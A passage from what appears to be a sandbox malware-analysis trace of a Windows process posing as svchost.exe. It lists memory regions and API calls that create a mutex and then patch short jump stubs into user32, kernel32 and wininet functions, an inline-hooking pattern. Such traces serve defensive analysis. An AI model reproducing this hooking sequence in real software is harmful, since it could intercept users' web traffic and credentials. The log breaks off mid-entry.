0x7e7c8000 end_va = 0x7e7cafff entry_point = 0x0 region_type = private name = "private_0x000000007e7c8000" filename = "" Region: id = 618 start_va = 0x55f0000 end_va = 0x55f9fff entry_point = 0x55f0000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" Region: id = 619 start_va = 0x73760000 end_va = 0x73785fff entry_point = 0x7376ec80 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\SysWOW64\\cryptnet.dll" Region: id = 620 start_va = 0x76400000 end_va = 0x76452fff entry_point = 0x764209c0 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" Region: id = 621 start_va = 0x7860000 end_va = 0x789ffff entry_point = 0x0 region_type = private name = "private_0x0000000007860000" filename = "" Region: id = 622 start_va = 0x78a0000 end_va = 0x78dffff entry_point = 0x0 region_type = private name = "private_0x00000000078a0000" filename = "" Region: id = 623 start_va = 0x73740000 end_va = 0x73752fff entry_point = 0x73742640 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" Region: id = 624 start_va = 0x7e7c5000 end_va = 0x7e7c7fff entry_point = 0x0 region_type = private name = "private_0x000000007e7c5000" filename = "" Region: id = 625 start_va = 0x73720000 end_va = 0x73733fff entry_point = 0x73723b10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" Region: id = 626 start_va = 0x78e0000 end_va = 0x78f2fff entry_point = 0x0 region_type = private name = "private_0x00000000078e0000" filename = "" Region: id = 627 start_va = 0x736b0000 end_va = 0x73717fff entry_point = 0x736d4b40 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" Region: id = 628 start_va = 0x78e0000 end_va = 0x78e4fff entry_point = 0x78e0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" Region: id = 629 start_va = 0x78f0000 end_va = 0x78fffff entry_point = 0x78f0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" Region: id = 630 start_va = 0x7900000 end_va = 0x793ffff entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 631 start_va = 0x7940000 end_va = 0x797ffff entry_point = 0x0 region_type = private name = "private_0x0000000007940000" filename = "" Region: id = 632 start_va = 0x7b00000 end_va = 0x7bfffff entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 633 start_va = 0x73680000 end_va = 0x736a1fff entry_point = 0x73689e80 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" Region: id = 634 start_va = 0x7e7c2000 end_va = 0x7e7c4fff entry_point = 0x0 region_type = private name = "private_0x000000007e7c2000" filename = "" Region: id = 635 start_va = 0x7860000 end_va = 0x7872fff entry_point = 0x0 region_type = private name = "private_0x0000000007860000" filename = "" Region: id = 636 start_va = 0x73660000 end_va = 0x73679fff entry_point = 0x7366fab0 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" Region: id = 637 start_va = 0x7860000 end_va = 0x7872fff entry_point = 0x0 region_type = private name = "private_0x0000000007860000" filename = "" Region: id = 638 start_va = 0x7860000 end_va = 0x7870fff entry_point = 0x0 region_type = private name = "private_0x0000000007860000" filename = "" Thread: id = 5 os_tid = 0x540 Thread: id = 6 os_tid = 0x7e4 [0059.510] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76460000 [0059.510] GetProcAddress (hModule=0x76460000, lpProcName="InterlockedIncrement") returned 0x76477520 [0059.511] GetProcAddress (hModule=0x76460000, lpProcName="HeapFree") returned 0x764725e0 [0059.511] GetProcAddress (hModule=0x76460000, lpProcName="GetProcessHeap") returned 0x76477910 [0059.511] GetProcAddress (hModule=0x76460000, lpProcName="HeapDestroy") returned 0x7647d940 [0059.511] GetProcAddress (hModule=0x76460000, lpProcName="HeapCreate") returned 0x76479950 [0059.511] GetProcAddress (hModule=0x76460000, lpProcName="InterlockedExchange") returned 0x76477650 [0059.512] GetProcAddress (hModule=0x76460000, lpProcName="HeapAlloc") returned 0x7740da90 [0059.512] GetProcAddress (hModule=0x76460000, lpProcName="GetProcAddress") returned 0x76477940 [0059.512] GetProcAddress (hModule=0x76460000, lpProcName="LoadLibraryA") returned 0x7647d8d0 [0059.512] GetProcAddress (hModule=0x76460000, lpProcName="GetModuleHandleA") returned 0x76479640 [0059.512] GetProcAddress (hModule=0x76460000, lpProcName="GetLastError") returned 0x76472db0 [0059.512] GetProcAddress (hModule=0x76460000, lpProcName="InterlockedDecrement") returned 0x76477560 [0059.513] GetProcAddress (hModule=0x76460000, lpProcName="Sleep") returned 0x764777b0 [0059.513] GetProcAddress (hModule=0x76460000, lpProcName="HeapReAlloc") returned 0x7740bae0 [0059.513] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x773d0000 [0059.515] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0059.515] GetProcAddress (hModule=0x773d0000, lpProcName="RtlAddVectoredExceptionHandler") returned 0x7742f090 [0059.516] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4ebb507) returned 0x52044d0 [0059.516] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x0 [0059.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76d70000 [0059.532] CryptAcquireContextW (in: phProv=0x4ecfe94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x4ecfe94*=0x5205680) returned 1 [0059.666] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0059.666] GetProcAddress (hModule=0x773d0000, lpProcName="RtlInitializeCriticalSection") returned 0x774295f0 [0059.667] GetModuleHandleA (lpModuleName="shlwapi.dll") returned 0x0 [0059.667] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x76ae0000 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="98") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="00") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="00") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="00") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="45") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="F7") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="50") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="B4") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="9C") returned 2 [0059.783] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="5A") returned 2 [0059.784] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="D7") returned 2 [0059.784] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="AD") returned 2 [0059.784] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="D3") returned 2 [0059.784] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="C6") returned 2 [0059.784] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="23") returned 2 [0059.784] wvnsprintfW (in: pszDest=0x4f5f3c0, cchDest=6, pszFmt="%02X", arglist=0x4f5f39c | out: pszDest="A5") returned 2 [0059.784] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4ece8a8, dwRevision=0x1 | out: pSecurityDescriptor=0x4ece8a8) returned 1 [0059.785] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4ece8a8, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4ece8a8) returned 1 [0059.785] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0059.793] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214250, lpbSaclPresent=0x4f5ed5c, pSacl=0x4f5ed54, lpbSaclDefaulted=0x4f5ed58 | out: lpbSaclPresent=0x4f5ed5c, pSacl=0x4f5ed54, lpbSaclDefaulted=0x4f5ed58) returned 1 [0059.793] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4ece8a8, bSaclPresent=1, pSacl=0x5214264, bSaclDefaulted=0 | out: pSecurityDescriptor=0x4ece8a8) returned 1 [0059.793] GetVersionExW (in: lpVersionInformation=0x4f5ec40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x53c453e5, dwMinorVersion=0xfffffffe, dwBuildNumber=0x7748adc5, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x4f5ec40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0059.793] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x4f5ed58 | out: TokenHandle=0x4f5ed58*=0x148) returned 1 [0059.793] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4f5ed5c | out: TokenInformation=0x0, ReturnLength=0x4f5ed5c) returned 0 [0059.794] GetLastError () returned 0x7a [0059.794] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x19, TokenInformation=0x5401020, TokenInformationLength=0x14, ReturnLength=0x4f5ed5c | out: TokenInformation=0x5401020, ReturnLength=0x4f5ed5c) returned 1 [0059.794] GetSidSubAuthorityCount (pSid=0x5401028) returned 0x5401029 [0059.794] GetSidSubAuthority (pSid=0x5401028, nSubAuthority=0x0) returned 0x5401030 [0059.794] CloseHandle (hObject=0x148) returned 1 [0059.794] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x4f5f60c | out: TokenHandle=0x4f5f60c*=0x148) returned 1 [0059.794] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4f5f5f8 | out: TokenInformation=0x0, ReturnLength=0x4f5f5f8) returned 0 [0059.794] GetLastError () returned 0x7a [0059.795] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x1, TokenInformation=0x5401020, TokenInformationLength=0x24, ReturnLength=0x4f5f5f8 | out: TokenInformation=0x5401020, ReturnLength=0x4f5f5f8) returned 1 [0059.795] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0xc, TokenInformation=0x4ece83c, TokenInformationLength=0x4, ReturnLength=0x4f5f610 | out: TokenInformation=0x4ece83c, ReturnLength=0x4f5f610) returned 1 [0059.795] CloseHandle (hObject=0x148) returned 1 [0059.795] GetLengthSid (pSid=0x5401028) returned 0x1c [0059.795] GetCurrentProcess () returned 0xffffffff [0059.795] GetModuleHandleA (lpModuleName="psapi.dll") returned 0x0 [0059.795] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x75f10000 [0059.799] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x4f5f410, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe") returned 0x1f [0059.799] GetCurrentProcessId () returned 0x2ec [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="D2") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="00") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="00") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="00") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="2A") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="14") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="C6") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="E5") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="29") returned 2 [0059.800] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="64") returned 2 [0059.801] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="F5") returned 2 [0059.801] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="19") returned 2 [0059.801] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="32") returned 2 [0059.801] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="B9") returned 2 [0059.801] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="F4") returned 2 [0059.801] wvnsprintfW (in: pszDest=0x4f5f368, cchDest=6, pszFmt="%02X", arglist=0x4f5f344 | out: pszDest="9F") returned 2 [0059.801] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="D20000002A14C6E52964F51932B9F49F") returned 0x148 [0059.801] GetLastError () returned 0x0 [0059.802] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75dd0000 [0059.803] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x0 [0059.803] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x740f0000 [0059.905] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x276, flAllocationType=0x3000, flProtect=0x40) returned 0x4ff0000 [0059.905] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x75deb9d0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x75deb000, AllocationBase=0x75dd0000, AllocationProtect=0x80, RegionSize=0x7a000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.906] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75deb9d0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.906] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75deb9d0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.906] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0000, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.906] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75deb9d0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.907] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75deb9d0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.907] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x75e029b0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x75e02000, AllocationBase=0x75dd0000, AllocationProtect=0x80, RegionSize=0x63000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.907] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75e029b0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.907] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75e029b0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.907] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff000a, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.907] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75e029b0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.908] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75e029b0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.908] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x76486330, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x76486000, AllocationBase=0x76460000, AllocationProtect=0x80, RegionSize=0x50000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.908] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x76486330, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.908] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76486330, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.908] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0014, lpBuffer=0x4f5f5a0*, nSize=0xb, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.908] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76486330, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.909] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x76486330, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.909] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74164510, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x74164000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x165000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.909] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74164510, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.909] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74164510, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.911] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff001f, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.911] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74164510, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.912] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74164510, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.912] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7413d400, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7413d000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x18c000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.912] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413d400, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.912] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413d400, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.913] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0029, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.913] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413d400, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.914] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413d400, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.914] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x741c5a50, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x741c5000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x104000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.914] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741c5a50, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.914] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741c5a50, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.914] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0033, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.914] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741c5a50, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.915] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741c5a50, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.916] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7413f5b0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7413f000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x18a000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.916] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413f5b0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.916] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413f5b0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.916] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff003d, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.916] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413f5b0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.917] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413f5b0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.917] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x741611e0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x74161000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x168000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.917] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741611e0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.917] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741611e0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.917] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0047, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.917] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741611e0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.918] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741611e0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.918] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7416d7e0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7416d000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x15c000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.918] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416d7e0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.918] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416d7e0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.919] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0051, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.919] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416d7e0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.919] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416d7e0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.919] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7416ff30, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7416f000, AllocationBase=0x740f0000, AllocationProtect=0x80, 